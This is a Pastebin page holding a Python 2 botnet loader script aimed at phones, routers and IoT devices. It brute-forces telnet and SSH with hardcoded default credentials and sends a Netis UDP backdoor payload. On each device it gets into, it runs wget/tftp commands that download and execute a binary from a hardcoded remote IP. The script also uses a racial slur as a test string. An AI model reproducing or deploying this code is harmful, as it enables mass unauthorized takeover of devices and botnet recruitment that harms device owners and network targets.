API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 16th, 2017
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.45 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. """
  3. phones
  4. By; DRe
  5. """
  6. import threading, sys, time, random, socket, re, os, paramiko
  7. from Queue import *
  8. from sys import stdout
  9.  
  10. if len(sys.argv) < 3:
  11. print "Usage: python "+sys.argv[0]+" <threads> <list>"
  12. sys.exit()
  13.  
  14. # USER AND PASS LISTS #
  15. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  16. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  17. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  18. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  19.  
  20.  
  21. # START CONFIGURATION #
  22. url = "http://207.154.203.163/tftp" # ARM4 Binary
  23. sh = "http://207.154.203.163/bins.sh" # SH File
  24. command = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://207.154.203.163/sshd || tftp -r sshd -g 207.154.203.163; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  25.  
  26. # DONT TOUCH
  27. spawn_shell = "cat | sh"
  28. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  29. threads = int(sys.argv[1])
  30. ips = open(sys.argv[2], "r").readlines()
  31. ports = ["23", "22", "53413"]
  32. queue = Queue()
  33. qcount = 0
  34. binary = url.split("/")
  35. binary = binary[3]
  36. ip = binary[2]
  37. found = 0
  38. count = 0
  39.  
  40. for ip in ips:
  41. qcount += 1
  42. stdout.write("\r[%d] Added to queue" % qcount)
  43. stdout.flush()
  44. queue.put(ip)
  45. print "\n"
  46.  
  47. def readUntil(tn, string, timeout=10):
  48. buf = ''
  49. start_time = time.time()
  50. while time.time() - start_time < timeout:
  51. buf += tn.recv(1024)
  52. time.sleep(0.01)
  53. if string in buf: return buf
  54. raise Exception('TIMEOUT!')
  55.  
  56. def worker():
  57. try:
  58. while True:
  59. try:
  60. if queue.empty() == True:
  61. sys.exit(1)
  62. ip = queue.get()
  63. ss = sssh(ip)
  64. ss.start()
  65. tt = ttelnet(ip)
  66. tt.start()
  67. nn = nnetis(ip)
  68. nn.start()
  69. queue.task_done()
  70. except:
  71. pass
  72. except:
  73. pass
  74.  
  75. class ttelnet(threading.Thread):
  76. def __init__ (self, ip):
  77. threading.Thread.__init__(self)
  78. self.ip = str(ip).rstrip('\n')
  79. def run(self):
  80. try:
  81. tn = socket.socket()
  82. tn.settimeout(5)
  83. tn.connect((self.ip,23))
  84. time.sleep(0.2)
  85. hoho = ''
  86. hoho += readUntil(tn, ":")
  87. if "mdm9625" in hoho:
  88. r00t = 0
  89. username = usernames[1]
  90. password = passwords[1]
  91. tn.send(username + "\n")
  92. elif "9615-cdp" in hoho:
  93. r00t = 1
  94. username = usernames[0]
  95. password = passwords[0]
  96. tn.send(username + "\n")
  97. elif "ogin" in hoho and "9615-cdp" not in hoho:
  98. zte = 1
  99. username = usernames[2]
  100. password = passwords[2]
  101. tn.send(username + "\n")
  102. elif "ogin" in hoho and "mdm9625" not in hoho:
  103. zte = 1
  104. username = usernames[2]
  105. password = passwords[2]
  106. tn.send(username + "\n")
  107. if "(none)" in hoho:
  108. zte = 0
  109. vizxv = 1
  110. username = usernames[3]
  111. password = passwords[3]
  112. tn.send(username + "\n")
  113. if "BCM" in hoho:
  114. zte = 0
  115. vizxv = 0
  116. BCM = 1
  117. username = usernames[1]
  118. password = passwords[1]
  119. tn.send(username + "\n")
  120. except Exception:
  121. tn.close()
  122. try:
  123. hoho = ''
  124. hoho += readUntil(tn, ":")
  125. if "assword" in hoho:
  126. tn.send(password + "\n")
  127. time.sleep(3)
  128. except Exception:
  129. tn.close()
  130. try:
  131. mp = ''
  132. mp += tn.recv(1024)
  133. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  134. if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  135. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  136. if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  137. if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139. except Exception:
  140. tn.close()
  141. pass
  142.  
  143. class nnetis(threading.Thread):
  144. def __init__ (self, ip):
  145. threading.Thread.__init__(self)
  146. self.ip = str(ip).rstrip('\n')
  147. def run(self):
  148. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  149. try:
  150. # sends netis payload to almost everything lmao
  151. s.sendto(loginpayload, (self.ip, 53413))
  152. time.sleep(1)
  153. s.sendto(commandpayload, (self.ip, 53413))
  154. time.sleep(2)
  155. except Exception:
  156. pass
  157.  
  158. class sssh(threading.Thread):
  159. def __init__ (self, ip):
  160. threading.Thread.__init__(self)
  161. self.ip = str(ip).rstrip('\n')
  162. def run(self):
  163. x = 1
  164. while x != 0:
  165. try:
  166. username='root'
  167. password="0"
  168. port = 22
  169. ssh = paramiko.SSHClient()
  170. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  171. dobreak=False
  172. for passwd in ssh_passwords:
  173. if ":n/a" in passwd:
  174. password=""
  175. else:
  176. password=passwd.split(":")[1]
  177. if "n/a:" in passwd:
  178. username=""
  179. else:
  180. username=passwd.split(":")[0]
  181. try:
  182. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  183. dobreak=True
  184. break
  185. except:
  186. pass
  187. if True == dobreak:
  188. break
  189. badserver=True
  190. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  191. output = stdout.read()
  192. if "nigger" in output:
  193. badserver=False
  194. if badserver == False:
  195. print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  196. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  197. time.sleep(3)
  198. ssh.close()
  199. if badserver == True:
  200. ssh.close()
  201. except:
  202. pass
  203. x = 0
  204.  
  205. for g in xrange(threads):
  206. t = threading.Thread(target=worker)
  207. t.setDaemon(True)
  208. t.start()
  209.  
  210. queue.join()
  211. print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!